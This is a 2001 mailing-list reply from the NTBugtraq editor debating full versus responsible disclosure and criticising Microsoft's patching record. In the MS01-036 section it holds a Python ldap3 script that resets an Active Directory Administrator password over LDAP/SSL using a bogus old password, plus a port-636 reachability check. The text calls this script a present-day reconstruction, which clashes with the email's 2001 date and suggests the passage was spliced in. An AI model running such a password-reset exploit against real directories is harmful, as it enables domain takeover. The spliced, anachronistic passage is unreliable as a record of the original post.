Re: Towards a responsible vulnerability process

From: Russ (Russ.Cooper@RC.ON.CA)
Date: 11/04/01

Date:         Sun, 4 Nov 2001 15:29:56 -0500
From: Russ <Russ.Cooper@RC.ON.CA>
Subject:      Re: Towards a responsible vulnerability process

This response to David's email has turned into my "bigger piece". It's a bit
of a ramble, so I hope you can follow along.

David LeBlanc wrote:

> This is an example of a simplistic approach and flawed logic. Some vendors
> might not be motivated, others might. To believe that vendors all behave
> the same way is flawed. To believe that behaviors don't change over time is
> to dismiss people's ability to learn from both their own mistakes and
> others'. For example, I proved in the past that I was stupid enough to
> drive around with no seatbelt. After flipping my VW Bus over end to end, I
> don't go out of my driveway without one. People and groups of people
> clearly change behaviors over time in many instances.

If seatbelts had just been invented, and nobody told you repeatedly to use
them, I might understand the validity of this statement. Unfortunately, it
demonstrates the lack of learning by both people and groups of people quite
well. Despite numerous warnings, studies, commercials, all stating the
obvious benefits of seatbelts, some people will happily ignore them until
something big enough happens.

This is the basis of some beliefs of Full Disclosure. Let the media make a
huge story out of a vulnerability and maybe the company involved will get
sufficiently embarrassed to respond in a way to avoid it more rigorously in
the future.

PoisonBox + Code Red + Nimda + Gartner report = Microsoft Strategic
Technology Protection Program.

Doesn't matter whether that equation is true or not, it's a valid perception
for the public to have. And it's a motivation for some malcode writers.

Microsoft has run the train off the tracks many times in the past. Two and a
half years ago that resulted in the Secure Windows Initiative. The Secure
Windows Initiative resulted in Windows XP being shipped with a Critical
Update being available on the day of its launch.

To use your car analogy, had XP been a car it would have been recalled,
fixed, and shipped anew. No such mechanism exists for Microsoft CDs despite
the clearly demonstrated historical proof that most people install the
defaults from the original CD and never update it.

> So a vendor who won't fix bugs unless their customers are threatened with
> active attack is a very different problem than one who fixes problems when
> they are reported. If you turn the clock back several years, there were
> more vendors in the first category than the second, and faced with that
> past reality, Full Disclosure (tm) was a reasonable response. I will argue
> that it may not be a reasonable response for all vendors today.

I think part of the point is being missed here, seriously. Getting a fix is
good, getting it fast is good, and getting one that works is also important.
The hard part is getting the fix applied before it's widely exploited.

The best way to effect that is to not produce software that requires such
fixes in the first place. "You're dreaming", I can hear the refrain coming
from software vendors now. Regardless, it's as factual that no software is
bug-free as it is that software must be bug-free.

Fact is that very few software vendors have demonstrated any capacity to do
better at this. In general, software vendors produce software that contains
security vulnerabilities, vulnerabilities that can be widely exploited, and
they then rely on the patch mechanisms to remedy the coding mistakes. This
despite the fact that, again in general, people have clearly demonstrated an
inability to use any mechanism that applies fixes.

So as you can see, everyone repeats the same mistakes over and over and
fails to learn. The insistence that there cannot be bug-free software,
coupled with the blessing that consumers today will accept being repeatedly
told they must invest their time and frustration in a Vendor's patch
process, leaves us with only one choice...stop publishing exploits.

A better patch process is still, at least, 6 months out. For all of
"Prefix", XP still launched with a Critical Update waiting on day one. David
LeBlanc and Michael Howard write a book about "writing secure code" despite
not seeing a significant tangible benefit from their talent through their
employer. Not to mention the fact that books decrying the perils of coding
insecurely have been written till the cows come home, without noticeable
effect on Microsoft programmers.

But then this is probably a 5-year plan, not something the fee-paying public
should expect to see quick effect from.

> As a short digression, I think that "Full Disclosure" has become a bit of
> a religious term, along with the requisite true believers and heretics.
> You're either one of us, or you're one of them. And those who we call them
> are always on the wrong side of everything. IMHO, this tends to discourage
> rational thought. This isn't to say that all proponents of Full Disclosure
> are irrational, just that we ought to think about ways to make the whole
> process work better. As security people, we're supposed to think outside
> the box, so I find it curious that we set about constructing our own
> boxes. <g> People sometimes construct some very interesting reality
> tunnels.

I agree, people do sometimes construct some very interesting reality
tunnels. Let me give you some examples:

1. NT 4.0 is hugely deployed, widely exploited, and quite obviously a very
bad example of secure coding, implementation, and use. Regardless, Microsoft
applies its Secure Windows Initiative to Windows XP, proclaiming that people
can upgrade to a more secure environment. Hmm, sounds like an upgrade plan
rather than an honest attempt to get people more secure.

Do we get new, secured versions of the NT 4.0 Option Pack? A version that
doesn't re-introduce known security vulnerabilities when it's run? A version
that acknowledges the many workarounds that have proven effective, embraces
them, and fills in the gaps? Nope, instead the Security CD offers us more of
what we've shown we don't want: patches, and scripts that ignore reality.

2. Can we slip-stream NT 4.0 service packs and Hotfixes yet? Nope, despite
the fact that doing so would mean Microsoft, and its customers, could
publish a CD that takes care of everything. But we can do this with W2K, so
just upgrade and you'll be more secure.

3. Have Microsoft Product Managers for the various products gotten together
and acknowledged that they need to work together? Not that we the public can
see. We get the "Cumulative NT 4.0" fix, the "Cumulative IIS 4.0" fix,
"Index Server patches", the "Office SRX" patch, "IE" patches, "SQL Server"
patches, and Exchange patches, and each is independent and rarely refers to
the others. Microsoft's reality suggests that NT Administrators want to, and
are able to, sort all of this out by themselves.

> Now let's rationally analyze what sorts of vulnerabilities lead to
> widespread attacks. I've seen a lot of vulnerabilities go by, some big,
> some small, and not all of them lead to widespread attacks. It's bad
> enough to have a problem in a system you're trying to protect without a
> bazillion monkeys (er, script kiddiez) all trying to hack you at once.
> Now, like any complex behavior, we have to deal with statistical trends -
> there are always going to be exceptions. Would it be possible to find
> security problems, get a fix created, get them applied, and do this
> without being subject to widespread attacks? I think so, because this
> happens sometimes. Can we possibly find ways to behave so that this
> happens more frequently? I think so.
>
> For example, one day at ISS, I came in to find every NT system on our
> network blue screened. Something had gone horribly wrong both in NT and
> our UNIX scanner. Within a couple of days, Microsoft gave us a private
> patch to test, it worked, and shortly thereafter they shipped a Hotfix
> (post SP-2 NT 4.0, I think). There was no advisory, no arm-twisting, and
> no public attacks. It would be hard to find a system today that would be
> vulnerable. It would be harder still to find the exploit. This is an
> example of the process working right.
>
> Now let's consider what widespread attacks have in common - there is
> typically a user-friendly attack created by someone. It is often preceded
> by published "proof-of-concept" code. It is sometimes preceded by an
> attack created in the black hat community that's leaked out. While
> discussing this with Mudge, he pointed out to me that black hat attacks
> leaking seem to be more common with UNIX exploits - neither of us is sure
> why. I would assert that creating and distributing a user-friendly attack
> is irresponsible, as it will most often lead to widespread attacks.

As you reduce the number of known, or widely discussed, vulnerabilities, you
simply reduce the number of potential widespread attacks. There was a study
done (by Don Parker, I believe) that said, in essence, it matters not how
old a vulnerability is: if it's published, it may be exploited. The nature
of vulnerabilities is such that it's near impossible to tell, with
certainty, whether something is going to be "widely exploited" or not until
the exploits come. Even locally-exploitable-only vulnerabilities have been
exploited remotely and en masse, thanks to HTML-based email, scripting, and
the like.
So, we should accept that there are only two choices. Don't disclose to
anyone other than the Vendor and hope nobody else ever discovers the same
problem before all affected systems are patched...or...disclose and accept,
indeed expect, widely exploited problems.

We have been practicing both for many years now, and it's unreasonable to
suggest that due to one, the other has failed. Both have failed. Emphasizing
one more than the other is likely to fail also.

The reason is that the problem does not lie within, and cannot be entirely
solved by, either practice. Yet it seems that now the emphasis is being
placed on one or the other practice. This is being done by Microsoft through
its "Information Anarchy" article, by other Vendors, and by the Research
community.

As the coiner of the phrase "Responsible Disclosure", I'd like to point out
that its intent has never been to emphasize one or the other disclosure
practice. Instead, the objective of Responsible Disclosure as I defined it
has been to promote better User/Consumer awareness of security.

For it's only with this awareness that there will be change. Consumers need
to make security a greater part of their purchase decision, be they the CIO
of a Fortune 500 company or a kid deciding which game to buy for his/her PC.
Gasoline consumption of your car was hardly ever considered prior to the
70's, but with the realities of oil shortages and rising costs, consumers
made mileage an important aspect of their car purchasing decisions. We need
to take a similar approach, or at least try to achieve a similar result.

When MS01-036 (Function exposed via LDAP over SSL could enable passwords to
be changed) was first disclosed to me on May 16th (fix published June 25th)
I was aghast. Basically, if you used Active Directory, and improved its
security by employing LDAP over SSL for AD communications, you opened
yourself up to an otherwise unexploitable condition. You could change the
Administrator password without having to know a prior password...simply send
a request to change the password with any old thing in the previous password
field and the password would be updated! Yikes!!
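
For illustration only, here's a rough modern sketch of what that kind of
password-change request looks like on the wire. This is my reconstruction,
not the discoverer's code: the server name, DN, and passwords are
placeholders, and it uses the present-day Python "ldap3" library, which
obviously didn't exist in 2001. In AD, a self-service password change is
normally an LDAP modify of the unicodePwd attribute that deletes the old
value and adds the new one; my reading of the bulletin is that the "old"
value simply wasn't being verified, so treat the details as illustrative.

    # Hypothetical sketch of an AD password change over LDAP/SSL (TCP 636)
    # using the Python "ldap3" library. All names/passwords are placeholders.
    import ssl
    from ldap3 import Server, Connection, Tls, MODIFY_DELETE, MODIFY_ADD

    def pwd(value):
        # AD expects unicodePwd as a double-quoted, UTF-16-LE encoded string
        return ('"%s"' % value).encode("utf-16-le")

    tls = Tls(validate=ssl.CERT_NONE)  # lab shortcut; validate certs for real
    server = Server("dc1.example.com", port=636, use_ssl=True, tls=tls)
    conn = Connection(server, auto_bind=True)  # anonymous, low-privilege bind

    # A proper self-service change supplies BOTH old and new passwords; the
    # server is supposed to refuse the modify if the deleted (old) value
    # doesn't match the current password.
    conn.modify(
        "CN=Administrator,CN=Users,DC=example,DC=com",
        {"unicodePwd": [(MODIFY_DELETE, [pwd("any old thing")]),
                        (MODIFY_ADD,    [pwd("N3w-Passw0rd!")])]},
    )
    print(conn.result)  # pre-MS01-036, the bogus old value went unchecked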

When I informed Microsoft of the issue I made the recommendation, after
discussing it with the discoverer, that the best thing would be to not say
anything to the public at all. Fix it, but see if we couldn't find some
other way of announcing a patch that didn't give away the fact that this
extremely important security feature was so badly botched in development. I
didn't see how anyone could benefit from being told the realities of the
problem, and since the only workaround was to not use SSL for LDAP password
changes (um, sounds rather insecure to me), only a patch could solve the
problem.
Basically, they said they couldn't bury the fix and needed to disclose it,
which they did. It's pretty likely that this will haunt W2K AD environments
for years to come.

My reasoning for not disclosing? If something as obvious as testing whether
or not a Domain Administrator's password could be changed without sufficient
privilege had been missed during QA, what else is missing? What would the
public think of AD, Microsoft, Microsoft's commitment to security, and the
security of an AD environment after having the issue explained to them?

The harm this could cause to confidence in Microsoft security would be huge,
I thought.

With AD the heart of all Microsoft-encouraged environments, and LDAP over
SSL being the obviously more secure method of use, the most secure setup
wasn't tested in almost 2 years of testing of W2K prior to release.

Where in May/June of this year I was of the opinion that such things need
not be disclosed to the public, today I'm far more convinced than ever that
such things need to be publicized as broadly as possible. Would you buy a
lock, or anything protected by a lock, from a company that doesn't test
whether (or fails to notice that) it can be opened by just any old key?

That's a statement of fact for any Microsoft-recommended configuration of
W2K Active Directory Controllers in existence today (or that will be
constructed from existing W2K CDs in the future) that hasn't had the patch
applied.

But due to a lack of disclosure and discussion, neither the discoverer nor I
ever published the simple and obvious steps that could exploit the
vulnerability, the issue was largely ignored by the media, and the public
remains largely unaware of it.

Are we likely to see exploitable boxes in the future? You're damn right we
are. What are the chances that not every AD controller out there is going to
have SP3 on it? I'd say pretty high. Shouldn't the CDs be recalled and
replaced with versions that don't contain the flaw? Isn't the problem
serious enough to warrant dramatic steps, given that the keys to the kingdom
are being left wide open to anyone who can connect on TCP 636?
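
To underline how low that bar is, here's a trivial sketch (mine, and the
hostname is a placeholder) of the only precondition the attack needed:
being able to complete a TCP connection to port 636.

    # Minimal sketch: can we reach a host on TCP 636 (LDAP over SSL)?
    # Reachability alone doesn't prove vulnerability; it's the precondition.
    import socket

    def ldaps_reachable(host, timeout=3.0):
        try:
            with socket.create_connection((host, 636), timeout=timeout):
                return True
        except OSError:
            return False

    print(ldaps_reachable("dc1.example.com"))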

Bottom line: no. Facts that allow people to make risk decisions, purchasing
decisions, and decisions about the integrity, veracity, and quality of a
given Vendor's product need to be aired, for as long as the Vendor sees fit
to leave the onus on the customer to take the appropriate steps to correct
the issue. If the Vendors did recalls, I believe, it would be different. If
the media were better able to reach the millions of consumers potentially
affected by these problems, it might be different. If the public was, in
general, more aware of the need to pay attention to these issues, it might
be different.

Unfortunately, none of those mitigating conditions holds today. So we need
to work on them, not on the Vulnerability Disclosure procedure.

> Let's think about how to set about actually finding vulnerabilities in
> systems. I've written several hundred checks for vulnerabilities.
> Sometimes, you either exploit the vulnerability or not - e.g., if you can
> log in via ...

Proof-of-concept code, user-friendly exploits, exploit scripts, etc... All
need to be considered within the context of the issue that's at hand. In
general, "thou shalt do no harm to those who have not caused the problem"
should be upheld. But what if the lemmings don't know they're DoS'ing the
Internet? What if the Web Hosting Provider knows their systems are
vulnerable and being exploited, but insists they can't afford the time to
fix them?
In the "Father knows best" environment that Microsoft seems to believe its
in, Microsoft needs to fix not only the problem, but the machines which are
vulnerable to (or being exploited via) the problem. Either give us a way
that *we want* to manage the issues, or do it for us. Giving us a way that's
less effort for Microsoft, one that keeps us liable, and disclaiming all
liabilities for the problem in the first place, is certainly not conducive
to the heart of the issue (getting fixes onto machines).

So, with those realities in mind, is it any wonder that people disclose,
write exploits, and cause widespread exploitation? I don't think it is.
Microsoft's not getting it, their customers aren't, so some people take
dramatic steps to make their point. Anti-social, sure! Malicious,
definitely! But what alternative is being spoken about? Solve the problem,
or just hide the problem as much as possible to make it appear like there's
less of a problem?
It's a matter of fact that Microsoft is leaving it largely up to its
customers to solve the problem.

> I also have experience as a development manager, and I can tell you for
> sure that the more pressure there is to get a fix out quickly, the less
> likely the fix is going to be thorough and the more likely it is to create
> new bugs. This is true of _any_ bug, not just security bugs. It's a good
> thing to give people enough time to fix things thoroughly. That's not to
> say that anyone should be allowed to just delay without cause - there's a
> balance to be struck here. A responsible vendor responds promptly, and a
> responsible reporter gives a vendor enough time to be thorough - you may
> have just uncovered the tip of the iceberg, and the quick fix to your
> problem might be simple. The fix to the bigger problem might be complex.
> I'd rather see one fix that is comprehensive than a series of quick fixes
> for the same thing.

Great, if all we care to know is that Microsoft has determined there's a
problem, assigned it their interpretation of a risk metric, and on their own
determined whether the fix is effective, breaks anything else, or breaks an
administrative process.

I would strongly argue that given Microsoft's current level of integrity on
such issues, *most people* do not want to leave it to Microsoft to do all of
this. It would be better to see fixes rolled out on a risk-by-risk basis
than something developed in a vacuum at Microsoft that rolls up numerous,
previously undisclosed, issues.

Since, I would argue vehemently, we cannot trust Microsoft to give us
sufficient information to ensure we can reasonably determine the risks of
our own actions (or lack thereof), we end up relying on others to give us
this information, knowledge, capability.

Microsoft expects us to apply each and every fix, yet determine whether or
not it's appropriate for our environment. We're often reminded that we
should only apply the fix if we've experienced the problems it describes.
Wonderful, but what if I haven't deployed the environment yet? What if I
don't understand how the problem can be manifested? How can I then determine
my risk, my exposure to the problem? It's a reactive premise, not proactive,
yet the customer wants proactive measures.

Ergo, it's often better for a researcher to dribble out issues with a given
service/application than to announce all of the problems at once. Microsoft
has clearly demonstrated in the past that it does not take vulnerability
discoveries much beyond the actual information it's given. For example:

MS01-034 - June 21, 2001, Change 1 byte in a Word document and skip all
Macro Security.
MS01-050 - October 4, 2001, Malform an Excel or PowerPoint document and skip
all Macro Security.

In the 3+ months after a discoverer informed Microsoft about the Word issue
behind MS01-034, the Office folks didn't bother to see if there was any
other way to do the same thing with Excel or PowerPoint. It took another
researcher to tell Microsoft how it could be done.

Well, it's obvious to me that I can rely on Microsoft to find and fix these
issues thoroughly. Would we have been better off waiting 3+ months for
Microsoft to discover the Excel and PowerPoint problems on their own, or was
the disclosure of the Word vulnerability the motivation for someone else to
find a similar problem in Excel and PowerPoint? I'd argue the latter is more
true than the former.

And there are a lot more examples with IIS and Unicode conversion than there
are with Office. So David, I'd argue that your point is invalid in the case
of Microsoft. It certainly may be valid with other Vendors though.

> Chris Wysopal (Weld Pond) has been doing these same sorts of things even
> longer than I have, and he's reached some similar conclusions. Think about
> how we can encourage vendors to make better products, get fixes created
> and applied, and do so without encouraging what amounts to network
> terrorism. That's the goal. Let's try and find ways to get there.

I'm sorry, but this goal is rather pathetic. It has been the goal for 30+
years, and it's failed miserably, so now is the time for a new approach. And
this new approach needs to be customer-centric, not Vendor-centric.

Vendors are getting paid to make better products, so they should hardly need
"encouragement". If they're not encouraged enough now, then they should
charge more for their products. The simple fact is that Vendors have not
been sufficiently moved by the cries and complaints of their customers to do
what they should be doing: writing better products.

"get fixes created and applied" again, isn't a Vendor problem. Making
Vendors liable for the problems their bugs create would be more than
adequate stimulation for Vendors to get fixes created and applied, but that
would never be proposed by a Vendor, now would it. Yet as long as a Vendor
has no liability, the Vendor will always have the luxury of making that
decision...seemingly regardless of what its customers say. In lieu of vendor
liability, give the customers the information they need to make accurate and
informed decisions.

As for encouraging network terrorism, obviously it harms those who are not
at fault for the problem, so it's never a good idea. The customer's only
hope of defending themselves is through information. Tell me I shouldn't go
out today because there is a terrorist threat, shame on you. Tell me that if
I wear a blue shirt and go out today I might be targeted, and I go out in a
blue shirt, shame on me.

IOW, as the main Vendor, Microsoft needs to *give* me easily understood and
usable tools that take my environment and protect me against terrorism
targeted at mistakes Microsoft has made in its products that I use.
Microsoft needs to do that proactively (otherwise I'm going to be subjected
to the terrorism) and comprehensively. Clearly this is a costly proposal,
and hopefully the cost of this effort will make it clear to the powers that
be that the better strategy is:

1. Better code.
2. Increased testing.
3. More secure defaults.
4. Security as an integral part of everything.
5. Increased user education (or simpler tools).

This with the thought in mind that we're vulnerable now, we don't all want
to move to a new environment, and we're being attacked as we speak!

Fix what we have!

Russ - NTBugtraq Editor
